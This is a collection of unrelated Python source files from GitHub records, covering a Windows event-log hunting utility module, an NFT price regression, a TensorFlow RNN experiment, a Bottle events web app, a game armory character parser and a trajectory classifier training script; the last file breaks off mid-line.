+{"seq_id":"21087709708","text":"import os\nimport glob\nimport logging\nimport jsonlines\nimport vars\nimport json\nimport pandas as pd\nimport platform\n\n\ndef create_log_fields_string(event, log_fields):\n output_strings = list()\n for field in log_fields:\n if field in event[\"Event\"][\"EventData\"]:\n output_strings.append(field + \":\" + event[\"Event\"][\"EventData\"][field])\n\n return \"\\n\\n\".join(output_strings)\n\n\ndef dict_flatten(in_dict, dict_out=None, parent_key=None, separator=\".\"):\n if dict_out is None:\n dict_out = {}\n\n for k, v in in_dict.items():\n k = f\"{parent_key}{separator}{k}\" if parent_key else k\n if isinstance(v, dict):\n dict_flatten(in_dict=v, dict_out=dict_out, parent_key=k)\n continue\n\n dict_out[k] = v\n\n return dict_out\n\n\ndef normalize_event(event):\n flattened_dict = dict_flatten(event)\n\n event_id = event[\"Event\"][\"System\"][\"EventID\"]\n if type(event_id) != int:\n event[\"Event\"][\"System\"][\"EventID\"] = event_id[\"#text\"]\n\n if \"EventData\" not in event[\"Event\"].keys() or event[\"Event\"][\"EventData\"] is None:\n event[\"Event\"][\"EventData\"] = dict()\n\n for k in event[\"Event\"][\"System\"].keys():\n event[\"Event\"][\"EventData\"][k] = event[\"Event\"][\"System\"][k]\n\n for k in event[\"Event\"].keys():\n if k != \"EventData\":\n event[\"Event\"][\"EventData\"][k] = event[\"Event\"][k]\n\n if \"UserData\" in event[\"Event\"].keys():\n for k in event[\"Event\"][\"UserData\"].keys():\n event[\"Event\"][\"EventData\"][k] = dict()\n for k_ in event[\"Event\"][\"UserData\"][k].keys():\n event[\"Event\"][\"EventData\"][k][k_] = event[\"Event\"][\"UserData\"][k][k_]\n\n for k, v in flattened_dict.items():\n event[\"Event\"][\"EventData\"][k.split(\".\")[-1]] = v\n\n return event\n\n\ndef retrieve_all_occurence_rules():\n for rule_info in json.load(open(vars.RULE_DIR + \"interesting_events.json\", 'r'))[\"rules\"]:\n yield rule_info\n\n\ndef retrieve_all_first_occurence_rules():\n for rule_info in json.load(open(vars.RULE_DIR + \"first_occurence.json\", 'r'))[\"rules\"]:\n yield rule_info\n\n\ndef retrieve_all_events():\n for file_info in json.load(open(vars.TMP_DIR + \"files.json\", 'r'))[\"files\"]:\n with jsonlines.open(file_info[\"json_dump_filename\"]) as reader:\n for item in reader:\n yield item\n\n\ndef get_description_for_event_id(event_id):\n event_id = int(event_id)\n description_loc = vars.EVENT_ID_MAPPING[vars.EVENT_ID_MAPPING['event_id'] == event_id]\n return ', '.join(description_loc[\"description\"].tolist())\n\n\ndef load_event_id_mappings():\n df = pd.read_csv(vars.EXTERNAL_DIR + \"event_id_mapping.csv\", delimiter=\";\")\n\n # using dictionary to convert specific columns\n convert_dict = {'event_id': int}\n df = df.astype(convert_dict)\n vars.EVENT_ID_MAPPING = df\n\n\ndef get_all_event_channels():\n event_channels = set()\n for file_info in json.load(open(vars.TMP_DIR + \"files.json\", 'r'))[\"files\"]:\n event_channels.update(list(file_info[\"event_channel_counts\"].keys()))\n\n return list(event_channels)\n\n\ndef get_recursive_filenames(path, file_suffix):\n filenames = list()\n\n for subdir, dirs, files in os.walk(path):\n for file in files:\n filename = os.path.join(subdir, file)\n if filename.endswith(file_suffix):\n filenames.append(filename)\n\n return filenames\n\n\ndef remove_all_tmp_json_files():\n files = glob.glob(vars.TMP_DIR + \"/evtx_dump/*.json\")\n for f in files:\n os.remove(f)\n\n\ndef setup_logger():\n logger = logging.getLogger('evtx-hunter')\n logger.setLevel(logging.DEBUG)\n\n # create console handler and set level to debug\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n # create formatter\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n # add formatter to ch\n ch.setFormatter(formatter)\n\n # add ch to logger\n logger.addHandler(ch)\n\n return logger\n\n\ndef sort_dict(_dict, reverse=False):\n event_summary_list = sorted(_dict.items(), key=lambda x: x[1], reverse=reverse)\n return dict(event_summary_list)\n\n\ndef is_cygwin():\n return platform.system().startswith(\"CYGWIN\")\n\n\ndef is_64_bit():\n return os.uname().machine == \"x86_64\"\n\n\ndef get_cygwin_root():\n return \"/cygwin\" + (\"64/\" if is_64_bit() else \"/\")\n\n\ndef set_cygwin_vars():\n if is_cygwin():\n vars.CYGWIN = True\n vars.CYGWIN_DIR = get_cygwin_root()\n vars.CYGDRIVE_DIR = \"/cygdrive/\"\n else:\n vars.CYGWIN = False\n\n\n# Forwards the original path or corrects it for Cygwin\ndef path_for_exe(path):\n # Path from Cygwin must be corrected before it can be used with .exe\n if vars.CYGWIN:\n # Ensures that the path is absolute \n path = os.path.abspath(path)\n # Path leads to a place within Windows filesystem\n if path.startswith(vars.CYGDRIVE_DIR):\n # Deletes the cygrdive prefix and the drive letter\n path = path[11:]\n # Path leads to a place within Linux filesystem\n else:\n # Adds the Cygwin prefix so .exe can reach the place\n path = vars.CYGWIN_DIR + path\n return path\n","repo_name":"NVISOsecurity/evtx-hunter","sub_path":"app/helpers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"32"}
+{"seq_id":"73296511452","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 28 14:20:05 2023\r\n\r\n@author: efthi\r\n\"\"\"\r\n\r\n#import lightgbm as lgb\r\nimport numpy as np\r\nfrom sklearn.model_selection import cross_val_score, KFold\r\nfrom sklearn.metrics import mean_squared_error\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport lightgbm as lgb\r\n\r\nlabel_encoder = LabelEncoder()\r\n\r\n\r\n# Assuming you have your features (X) and target variable (y) ready\r\nEtherium_price = pd.read_csv(r\"C:\\Users\\efthi\\Downloads\\cryptopunks_test_bundle\\20230509\\eth_usd_fx_rates.csv\")\r\ntokens_metadate = pd.read_csv(r\"C:\\Users\\efthi\\Downloads\\cryptopunks_test_bundle\\20230509\\token_metadata.csv\")\r\ntokens_sales = pd.read_csv(r\"C:\\Users\\efthi\\Downloads\\cryptopunks_test_bundle\\20230509\\token_sales.csv\")\r\n\r\n\r\n'''\r\nMerged and sorted given the token \r\nindex firstly and then the timestamp\r\n'''\r\nData = pd.merge(tokens_metadate, tokens_sales, on='token_index')\r\nData = Data.filter(regex='^(?!Unnamed)')\r\n\r\n\r\ncat_features = ['Skin Tone', \"Type\", \"Hair\",\r\n \"Eyewear\", \"Mouth\", \"Headwear\",\r\n \"Facial Hair\", \"Smoking Device\",\r\n \"Other:Earring\", \"Neckwear\",\r\n \"Skin Feature\", \"Other:Medical Mask\",\r\n \"Other:Clown Nose\", \"Trait Count\",\r\n \"rarest_property_name\"]\r\n\r\nfor feature in cat_features:\r\n Data[feature] = Data[feature].astype('category').cat.codes\r\n\r\n\r\nimport re\r\nData = Data.rename(columns = lambda x:re.sub('[^A-Za-z0-9_]+', '', x))\r\n\r\n\r\n\"\"\"\r\ncreate a dataset with the unique nft which \r\nare sold only once so we dont have historic data to train our model\r\n\"\"\"\r\n# Identify duplicate rows\r\nduplicates = Data.duplicated(subset= \"token_index\", keep=False)\r\ndf_duplicates = Data[duplicates]\r\ndf_unique = Data[~duplicates]\r\n\r\n\r\n'''\r\nThis \"test\" dataset contains only the token \r\nwith the last sold price given the timestamp plus the unique tokens\r\nwhich might be sold only once\r\n'''\r\n# Sort the dataframe by 'timestamp' in descending order\r\ndf_sorted = Data.sort_values(by='timestamp', ascending=False)\r\n\r\n# Drop duplicates based on 'token_index' while keeping the row with the largest 'timestamp'\r\nTest_data = df_sorted.drop_duplicates(subset='token_index', keep='first')\r\n\r\nX_test = Test_data.drop(columns=[\"eth\",'usd'])\r\nY_test = Test_data.loc[:, Test_data.columns == 'eth']\r\n\r\n\r\n\r\n'''\r\nKeep the data which have been sold more than once.\r\n'''\r\nTrain_data_x = df_sorted[~df_sorted['timestamp'].isin(Test_data['timestamp'])]\r\nTrain_data = Train_data_x[~Train_data_x['token_index'].isin(df_unique['token_index'])]\r\n\r\nX_train = Train_data.drop(columns=[\"eth\",'usd'])\r\ny_train = Train_data.loc[:, Train_data.columns == 'eth']\r\n\r\n\r\n\r\n# Create a LightGBM dataset\r\ntrain_data = lgb.Dataset(X_train, label=y_train)\r\n\r\n\r\nparams = {\r\n 'boosting_type': 'gbdt',\r\n 'objective': 'regression',\r\n 'metric': 'mse',\r\n 'num_leaves': 100,\r\n 'learning_rate': 0.05,\r\n 'feature_fraction': 0.9,\r\n 'bagging_fraction': 0.8,\r\n 'bagging_freq': 5,\r\n 'verbose': 0\r\n}\r\n\r\n# Train the model\r\nnum_rounds = 100\r\nmodel = lgb.train(params, train_data, num_rounds)\r\n\r\n# Make predictions on the testing set\r\ny_pred = model.predict(X_test)\r\n\r\n# Evaluate the model\r\nmse = mean_squared_error(Y_test, y_pred)\r\nprint('Mean Squared Error:', mse)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"EfthyvoulosDrousiotis/NFT_valuation","sub_path":"NFT_valuations.py","file_name":"NFT_valuations.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"34036293525","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\n\r\n\r\n\r\ntruncatedBackpropLength = 5\r\nnumOfInputNodes = 1\r\nnumOfOutputNodes = 2\r\n\r\nnumOfHiddenNodes = 6\r\n\r\nbatchSize = 4\r\n\r\nrandScaler = 0.01\r\n\r\n\r\n\r\nsess = tf.Session()\r\n\r\nx_batch = tf.placeholder(tf.float32, shape=[None, truncatedBackpropLength, numOfInputNodes])\r\ny_batch = tf.placeholder(tf.float32, shape=[None, truncatedBackpropLength, numOfOutputNodes])\r\n\r\n\r\nx_list = []\r\n\r\nW2 = tf.Variable(np.random.rand(numOfInputNodes,numOfHiddenNodes)*randScaler, dtype=tf.float32)\r\nb_hidden = tf.Variable(tf.zeros([numOfHiddenNodes]))\r\n\r\nW3 = tf.Variable(np.random.rand(numOfHiddenNodes,numOfHiddenNodes)*randScaler, dtype=tf.float32)\r\ncontext = tf.Variable(tf.zeros([batchSize, numOfHiddenNodes]), dtype=tf.float32)\r\n\r\nW4 = tf.Variable(np.random.rand(numOfHiddenNodes,numOfOutputNodes)*randScaler, dtype=tf.float32)\r\nb_output = tf.Variable(tf.zeros([numOfOutputNodes]))\r\n\r\ncross_entropy_sum = tf.Variable(tf.zeros([1]))\r\naccuracy_list = []\r\n\r\n\r\nfor seriesStep in range (truncatedBackpropLength):\r\n xTemp = tf.squeeze(tf.slice(x_batch, [0,seriesStep,0], [-1, 1, -1]))\r\n y_label = tf.squeeze(tf.slice(y_batch, [0,seriesStep,0], [-1, 1, -1]))\r\n\r\n if (numOfInputNodes == 1):\r\n \txTemp = tf.reshape(xTemp, [batchSize, numOfInputNodes])\r\n \ty_label = tf.reshape(y_label, [batchSize, numOfOutputNodes])\r\n\r\n x_list.append(xTemp)\r\n\r\n\r\n \r\n hidden = tf.matmul(xTemp,W2) + tf.matmul(context,W3) + b_hidden\r\n \r\n # context = hidden\r\n hidden_clipped = tf.nn.tanh(hidden) \r\n context = hidden_clipped\r\n output = tf.matmul(hidden_clipped, W4) + b_output\r\n \r\n\r\n y_predicted = tf.nn.softmax(output)\r\n\r\n \r\n correct_prediction = tf.equal(tf.argmax(y_predicted,1), tf.argmax(y_label,1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n accuracy_list.append(accuracy)\r\n \r\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_label * tf.log(y_predicted), reduction_indices=[1]))\r\n cross_entropy_sum = cross_entropy_sum + cross_entropy\r\n\r\ncontext_final = context\r\ncross_final = cross_entropy_sum\r\nLEARNING_RATE = 0.05\r\ntraining = tf.train.GradientDescentOptimizer(LEARNING_RATE).minimize(cross_entropy_sum)\r\n\r\nx_final = x_list\r\naccuracy_final = accuracy_list\r\n\r\n\r\n \r\n\r\ninit = tf.global_variables_initializer()\r\nsess.run(init)\r\n\r\nimport numpy as np\r\n\r\n# Start= [1,0,0,0,0,0,0]\r\n# Coffee= [0,1,0,0,0,0,0];\r\n# Tea= [0,0,1,0,0,0,0];\r\n# Water= [0,0,0,1,0,0,0];\r\n# Cream= [0,0,0,0,1,0,0];\r\n# Sugar= [0,0,0,0,0,1,0];\r\n# Stir= [0,0,0,0,0,0,1];\r\n\r\n\r\n# # %%% output; this is the teacher output \r\n# Coffeeout= [1,0,0,0,0,0,0,0]; \r\n# Teaout= [0,1,0,0,0,0,0,0];\r\n# Waterout= [0,0,1,0,0,0,0,0];\r\n# Creamout= [0,0,0,1,0,0,0,0];\r\n# Sugarout= [0,0,0,0,1,0,0,0];\r\n# Stirout= [0,0,0,0,0,1,0,0];\r\n# Coffeebev= [0,0,0,0,0,0,1,0];\r\n# Teabev= [0,0,0,0,0,0,0,1];\r\n\r\n# inputBatch = []\r\n# outputBatch = []\r\n\r\n# # %%% Seq1 tea water second \r\n\r\n# TWInp=[Start,Tea,Water,Stir,Sugar,Stir]\r\n# TWOut=[Teaout,Waterout,Stirout,Sugarout,Stirout,Teabev]\r\n\r\n# inputBatch.append(TWInp)\r\n# outputBatch.append(TWOut)\r\n\r\n# # %%% Seq2 tea water second \r\n\r\n# TSInp=[Start,Tea,Sugar,Stir,Water,Stir]\r\n# TSOut=[Teaout,Sugarout,Stirout,Waterout,Stirout,Teabev]\r\n\r\n# inputBatch.append(TSInp)\r\n# outputBatch.append(TSOut)\r\n\r\n\r\n# # %%% Seq3 coffee water first \r\n\r\n# CWInp=[Start,Coffee,Water,Stir,Cream,Stir]\r\n# CWOut=[Coffeeout,Waterout,Stirout,Creamout,Stirout,Coffeebev]\r\n\r\n# inputBatch.append(CWInp)\r\n# outputBatch.append(CWOut)\r\n\r\n\r\n# # %%% Seq4 coffee water second\r\n\r\n# CCInp=[Start,Coffee,Cream,Stir,Water,Stir]\r\n# CCOut=[Coffeeout,Creamout,Stirout,Waterout,Stirout,Coffeebev]\r\n\r\n# inputBatch.append(CCInp)\r\n# outputBatch.append(CCOut)\r\n\r\n\r\ntotal_series_length = 50000\r\necho_step = truncatedBackpropLength\r\nbatch_length = int(total_series_length/batchSize)\r\n\r\ndef generateData():\r\n\tx = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))\r\n\ty = np.roll(x, echo_step)\r\n\ty[0:echo_step] = 0\r\n\r\n\ty_hot = [(1-yTemp)*[1,0] + yTemp*[0,1] for yTemp in y]\r\n\r\n\r\n\ty_hot_list = []\r\n\tfor i in range(batchSize):\r\n\t\ty_hot_Temp = y_hot[i*batch_length:i*batch_length+batch_length]\r\n\t\ty_hot_list.append(y_hot_Temp)\r\n\r\n\tx = x.reshape((batchSize, batch_length)) # The first index changing slowest, subseries as rows\r\n\t# y_hot = y_hot.reshape((batchSize, batch_length))\r\n\r\n\treturn (x, y_hot_list)\r\n\r\n\r\nx, y = generateData()\r\n\r\nprint('Size of X: ' + str(len(x)) + '*' + str(len(x[0])))\r\nprint('Size of Y: ' + str(len(y)) + '*' + str(len(y[0])))\r\n\r\nimport random\r\n\r\nTRAIN_STEPS = 50000\r\nweightList1 = []\r\nweightList2 = []\r\nweightList3 = []\r\nweightList4 = []\r\n# with sess.as_default():\r\nfor i in range(TRAIN_STEPS):\r\n\t# randIndex = random.randint(truncatedBackpropLength, len(x[0]))\r\n\trandIndex = i+truncatedBackpropLength\r\n\r\n\tx_train = x[:,randIndex-truncatedBackpropLength:randIndex]\r\n\ty_train = [tempRow[randIndex-truncatedBackpropLength:randIndex] for tempRow in y]\r\n\t# y[:,randIndex-truncatedBackpropLength:randIndex]\r\n\r\n\tx_train = x_train.reshape((batchSize, truncatedBackpropLength, 1))\r\n\t# y_train = y_train.reshape((batchSize, truncatedBackpropLength, 2))\r\n\r\n\r\n\tsess.run(training, feed_dict={x_batch: x_train, y_batch: y_train})\r\n\r\n\tif (i%100==0):\r\n\t\t# randIndex = random.randint(truncatedBackpropLength, len(x[0]))\r\n\t\trandIndex = i+truncatedBackpropLength\r\n\r\n\t\tx_test = x[:,randIndex-truncatedBackpropLength:randIndex]\r\n\t\ty_test = [tempRow[randIndex-truncatedBackpropLength:randIndex] for tempRow in y]\r\n\t\t# y[:,randIndex-truncatedBackpropLength:randIndex]\r\n\r\n\t\tx_test = x_test.reshape((batchSize, truncatedBackpropLength, 1))\r\n\t\t# y_test = y_test.reshape((batchSize, truncatedBackpropLength, 1))\r\n\r\n\t\t# print('input: ')\r\n\t\t# print(x_test)\r\n\r\n\t\tprint('Training Step: ' + str(i) + ' Accuracy = ' + str(sess.run(accuracy_final, feed_dict={x_batch: x_train, y_batch: y_train})) + ' Loss = ' + str(sess.run(cross_final, {x_batch: x_train, y_batch: y_train})))\r\n\t\t\r\n\t\tb = sess.run(W3)\r\n\t\tweightList1.append(b[0])\r\n\t\tweightList2.append(b[1])\r\n\r\n\t\tc = sess.run(W4)\r\n\t\tweightList3.append(c[2])\r\n\t\tweightList4.append(c[3])\r\n\t\t# print(b[:,6:8])\r\n\r\n\t# context = tf.Variable(tf.zeros([batchSize, numOfHiddenNodes]), dtype=tf.float32)\r\n\r\nimport matplotlib.pyplot as plt \r\nplt.figure(1)\r\nplt.subplot(411)\r\nplt.plot(weightList1)\r\nplt.subplot(412)\r\nplt.plot(weightList2)\r\nplt.subplot(413)\r\nplt.plot(weightList3)\r\nplt.subplot(414)\r\nplt.plot(weightList4)\r\nplt.ylabel('some numbers')\r\nplt.show()","repo_name":"dshahnazian/Recurrent-neural-network","sub_path":"Danesh_RNN_General.py","file_name":"Danesh_RNN_General.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"6055658836","text":"import bottle\nfrom bottle import Bottle,route,run,request,template,static_file\nimport json\nfrom sys import argv\nimport requests\n@route('/',method=\"get\")\ndef eventfull():\n return template ('template.tpl')\n@route('/eventfull',method=\"post\")\ndef eventfull():\n ciudad = request.forms.get('ciudad')\n tipo = request.forms.get('tipo')\n a=open(\".key_eventfull.txt\",\"r\")\n key=a.readline()\n payload={\"app_key\":key, \"location\": ciudad, \"keywords\":tipo}\n r=requests.get(\"http://api.eventful.com/json/events/search?keywords=\"+tipo+\"&location=\"+ciudad+\"&app_key=\"+key)\n if r.status_code == 200:\n js=json.loads(r.text)\n titulo=[]\n empezar=[]\n lugar=[]\n for i in js[\"events\"][\"event\"]:\n titulo.append(i[\"title\"])\n empezar.append(i[\"start_time\"])\n lugar.append(i[\"venue_name\"])\n return template('template2.tpl', titulo=titulo, empezar=empezar, lugar=lugar, ciudad=ciudad, tipo=tipo)\n\n@route('/static/')\ndef server_static(filepath):\n\treturn static_file(filepath, root='static')\n\nif __name__ == '__main__':\n\trun(host='0.0.0.0',port=argv[1])","repo_name":"juanjoselopezroldan/prueba_bottle","sub_path":"eventfull.py","file_name":"eventfull.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"18420184567","text":"\"\"\" Character Summary parsing functions \"\"\"\n\nimport re\n\nfrom src.itemParser import getItemInfos\nfrom src.utils import getHtmlText\nfrom src.gearScore import createGearScoreDictionnary\n\n\ndef hasEnchantProfession(profession, minProfLvl):\n \"\"\" Check if character has profession enchant above a determined level \"\"\"\n profLvl = int(re.search(r'\\d+', profession).group(0))\n return profLvl >= minProfLvl\n\n\ndef processItems(itemsList, isBlacksmith, isEnchanter, isHunter, isWarrior):\n \"\"\" Process each items to know if they are fully optimised \"\"\"\n\n notEnchantedItems = []\n notGemmedItems = []\n totalItemLvl = 0\n totalGearScore = 0\n equippedItems = 0\n # Fury war has special calculation method taking in account having 2 2H weaps\n hasAlreadyATwoHandWeapOn = False\n twoHandWeapGearScore = [0, 0]\n # Calling it here so we only create it once per command\n gearScoreDict = createGearScoreDictionnary()\n\n excludedSlots = ['Shirt', 'Tabard']\n itemsToBeEnchant = ['Head', 'Shoulder', 'Back', 'Chest',\n 'Wrist', 'Hands', 'Legs', 'Feet',\n 'One-hand', 'Off Hand', 'Two-hand']\n\n if isEnchanter:\n itemsToBeEnchant.append('Finger')\n if isHunter:\n itemsToBeEnchant.append('Ranged')\n\n # Blacksmith can get another gem slot on some items (badly reported in url)\n itemsToBeBlacksmithEnchant = ['Wrist', 'Hands']\n\n for item in itemsList:\n # Power is there to reach an 'API' (not a real one btw...)\n itemUrl = item.find('a').get('href') + '&power=true'\n infosFromRel = item.find('a').get('rel')\n itemAdditionnalInfos = re.search(\n '&{1}.*', infosFromRel[0]) if infosFromRel is not None else None\n\n if itemAdditionnalInfos is not None:\n itemAdditionnalInfos = itemAdditionnalInfos.group(0)\n itemUrl += itemAdditionnalInfos\n\n if '#self' not in itemUrl:\n itemInfos = getItemInfos(itemUrl, gearScoreDict)\n itemSlot = itemInfos['itemSlot']\n\n hasToHaveBonusGemSlot = itemSlot == 'Waist' or (\n itemSlot in itemsToBeBlacksmithEnchant and isBlacksmith)\n if hasToHaveBonusGemSlot:\n itemInfos = getItemInfos(itemUrl, gearScoreDict, hasToHaveBonusGemSlot)\n\n # Checking what is missing in item\n if itemInfos['missingGems']:\n notGemmedItems.append(itemSlot)\n if itemInfos['missingEnchant'] and itemSlot in itemsToBeEnchant:\n notEnchantedItems.append(itemSlot)\n if itemSlot not in excludedSlots:\n equippedItems += 1\n totalItemLvl += itemInfos['itemLevel']\n totalGearScore += itemInfos['itemGearScore']\n\n # pylint: disable=too-many-boolean-expressions\n if isWarrior and (itemInfos['itemSlot'] == 'Two-hand' or (\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'Two-hand') or\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'One-hand') or\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'Off Hand') or\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'Held In Off-Hand')\n )):\n minGs = min(twoHandWeapGearScore)\n twoHandWeapMinIndex = twoHandWeapGearScore.index(minGs)\n twoHandWeapGearScore[twoHandWeapMinIndex] = itemInfos['itemGearScore']\n\n # Getting new values after modifications\n minGs = min(twoHandWeapGearScore)\n maxGs = max(twoHandWeapGearScore)\n\n # To calculate gearscore, we have to ignore the second 2H weap GS,\n # get the difference between Main Hand and Off Hand\n # divide it by 2, round it up and substract it to the total sum\n # If difference is equal to 1\n # That means we are crawling first weapon or the character is wearing only\n # one Two hands weapon\n if minGs != 0:\n differenceBetweenTwoHandWeaps = int((maxGs - minGs)/2) + 1\n\n if hasAlreadyATwoHandWeapOn:\n totalGearScore -= minGs + differenceBetweenTwoHandWeaps\n else:\n hasAlreadyATwoHandWeapOn = True\n\n if equippedItems != 0:\n avgItemLvl = \"%.2f\" % float(totalItemLvl/equippedItems)\n else:\n avgItemLvl = 0\n\n return {\n 'notEnchantedItems': notEnchantedItems,\n 'notGemmedItems': notGemmedItems,\n 'avgItemLvl': avgItemLvl,\n 'itemGearScore': totalGearScore,\n }\n\n\ndef processList(providedList):\n \"\"\" Process the provided items list \"\"\"\n items = []\n\n for item in providedList.findAll(class_='text'):\n items.append(' '.join(item.text.split()).replace(' / ', '/'))\n\n return items\n\n\ndef getCharInfos(\n url='http://armory.warmane.com/character/Ashaladin/Icecrown/summary', htmlText=None\n):\n \"\"\" Get character informations \"\"\"\n\n if htmlText is None:\n html = getHtmlText(url)\n else:\n html = htmlText\n\n # Ensure char is found before scrap anything else\n if len(html.findAll(string=re.compile(r'Page not found'))) > 0:\n return 'Character not found, please check your informations and try again.'\n\n charMainInfos = html.find(class_='information-left')\n\n # Hunter will need to have Ranged slot checked (enchant)\n isHunter = 'Hunter' in charMainInfos.text\n isWarrior = 'Warrior' in charMainInfos.text\n\n # Grouping variables:\n # First group is html info retrieving\n # Second is extracted data\n charAndGuildName = charMainInfos.find(class_='name').text.split(' ')\n itemsPath = html.findAll(class_='item-slot')\n specsPath = html.find(class_='specialization')\n professionsSummary = []\n professionsPath = html.findAll(class_='profskills')\n isBlacksmith = False\n isEnchanter = False\n\n charName = charAndGuildName.pop(0).strip()\n guildName = ' '.join(charAndGuildName) if charAndGuildName[0] != u'\\xa0' else 'No Guild'\n lvlRaceClass = charMainInfos.find(class_='level-race-class').text.strip()\n\n professions = []\n for professionsType in professionsPath:\n professions.append(processList(professionsType))\n\n # Processing multiple arrays into one (1 array per professionType (main & secondary profs))\n for professionType in professions:\n for profession in professionType:\n # We have to check blacksmith level to ensure the bonus gem slots are available\n if 'Blacksmithing' in profession:\n isBlacksmith = hasEnchantProfession(profession, 400)\n if 'Enchanting' in profession:\n isEnchanter = hasEnchantProfession(profession, 400)\n professionsSummary.append(profession)\n\n getSpecializations = processList(specsPath)\n itemsCheck = processItems(itemsPath, isBlacksmith, isEnchanter, isHunter, isWarrior)\n\n summary = {\n 'url': url,\n 'charName': charName,\n 'guildName': guildName,\n 'lvlRaceClass': lvlRaceClass,\n 'professions': professionsSummary,\n 'specs': getSpecializations,\n 'itemsCheck': itemsCheck\n }\n\n return summary\n","repo_name":"Rdyx/warmane-armory-bot","sub_path":"src/charsumParser.py","file_name":"charsumParser.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"26780102096","text":"#liste gibi ama her elemanı bir kez ekleyebiliriz\nlistem=[1,2,3,2,3]\nsetim=set(listem)\nprint(setim)\n#seti direk tanımlama\nset2={\"a\",\"b\",\"c\"}\nset2.add(\"d\")\nprint(set2)\n#boş set tanımlama\nset3=set()\n","repo_name":"semihuzunCE/Python","sub_path":"3-setler.py","file_name":"3-setler.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"40739251764","text":"\"\"\"\r\nThis is a test for classify the trajectories.\r\nWE have three kinds of trajectories: | L_D| c_aphi| c_h|\r\n with label: | 0 | 1 | 2 |\r\n\r\nTry to use linear+LSTM+linear NET.\r\n\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nimport os\r\nfrom utils.dataset import dataset,collate_fn\r\nimport torch.nn as nn\r\nimport torch.optim\r\nimport torch.utils.data as Data\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom Classify_net import Classify\r\nfrom utils.d_process import *\r\nfrom torch.optim import lr_scheduler\r\nfrom train_util import train, trainlog\r\nimport logging\r\n#device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n# Hyper Parameters\r\nINPUT_SIZE = 6\r\nOUTPUT_SIZE = 3\r\nTIME_STEP = 1200\r\nLINEAR1_OUT = 32 # D:通过6维输入,提取另外的特征 *2\r\nHIDDEN_SIZE = 64 # 记录调试日志\r\nBATCH_SIZE = 64 #NUM_LATERS = 2 #\r\nLR = 0.01\r\nN_TRAIN_POINTS = 100 #没有用到\r\nEPOCH = 1000 #没有用到\r\nMAX_LEN = 600\r\n\r\nsave_dir = r'F:\\classi\\model_test_1_16/'\r\nif not os.path.exists(save_dir):\r\n os.makedirs(save_dir)\r\nlogfile = '%s/trainlog.log'%save_dir\r\ntrainlog(logfile)\r\n# 原始数据\r\nrawdata_root = r'F:\\classi\\train/'\r\n# 读标签\r\nall_pd = pd.read_csv(r\"F:\\HXDD/dataset_train.csv\", sep=\",\",\r\n header=None,\r\n names=[\"file_name\",\"label\"])[1:] ##加r''的目的在于啥 ,dataset_train.csv好像有点不对\r\n\r\n#print(all_pd.head())\r\n# 训练数据和测试数据划分\r\ntrain_pd, val_pd = train_test_split(all_pd, test_size=0.25, random_state=43,\r\n stratify=all_pd['label']) #去查下这个函数的用法 2020-10-20 有可能指的是标签只有1维\r\n# print(val_pd.shape)\r\n\r\n# 数据预测处理\r\ndata_process = {\r\n 'train':data_process(max_len=MAX_LEN),\r\n 'val':data_process(max_len=MAX_LEN)\r\n}\r\ndata_set={}\r\ndata_set['train']=dataset(trajroot=rawdata_root, anno_pd=train_pd,\r\n dprocess=data_process['train']) #train_pd 应该调成 val_pd,原先为train_pd\r\ndata_set['val']=dataset(trajroot=rawdata_root, anno_pd=val_pd,\r\n dprocess=data_process['val']) #train_pd 应该调成 val_pd,原先为train_pd\r\n# sklearn读取数据,数据打包\r\ndataloader={}\r\ndataloader['train']=torch.utils.data.DataLoader(data_set['train'],batch_size=BATCH_SIZE,\r\n shuffle=True,num_workers=0,collate_fn=collate_fn) #参数决定了由几个进程来处理\r\n\r\ndataloader['val']=torch.utils.data.DataLoader(data_set['val'],batch_size=BATCH_SIZE,\r\n shuffle=True,num_workers=0,collate_fn=collate_fn)\r\n\r\n'''model'''\r\nmodel = Classify()\r\nbase_lr = 0.01\r\nresume = None\r\n# 第一次运行使用resume=None\r\n# resume=None\r\nif resume:\r\n # 加载已有模型\r\n model.eval()\r\n model.load_state_dict(torch.load(resume))\r\nmodel.double() # cuda之前需要将数据转换\r\nmodel.cuda()\r\n\r\n\r\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001,betas=(0.9, 0.999), eps= 1e-08, weight_decay=1e-5)\r\ncriterion = nn.CrossEntropyLoss()\r\nexp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1) # 设置学习率,lr*gama^(epoch/step_size)\r\nif __name__ == '__main__':\r\n train(model,\r\n epoch_num=100,\r\n start_epoch=0,\r\n optimizer=optimizer,\r\n criterion=criterion,\r\n exp_lr_scheduler=exp_lr_scheduler,\r\n data_set=data_set,\r\n data_loader=dataloader,\r\n save_dir=save_dir,\r\n 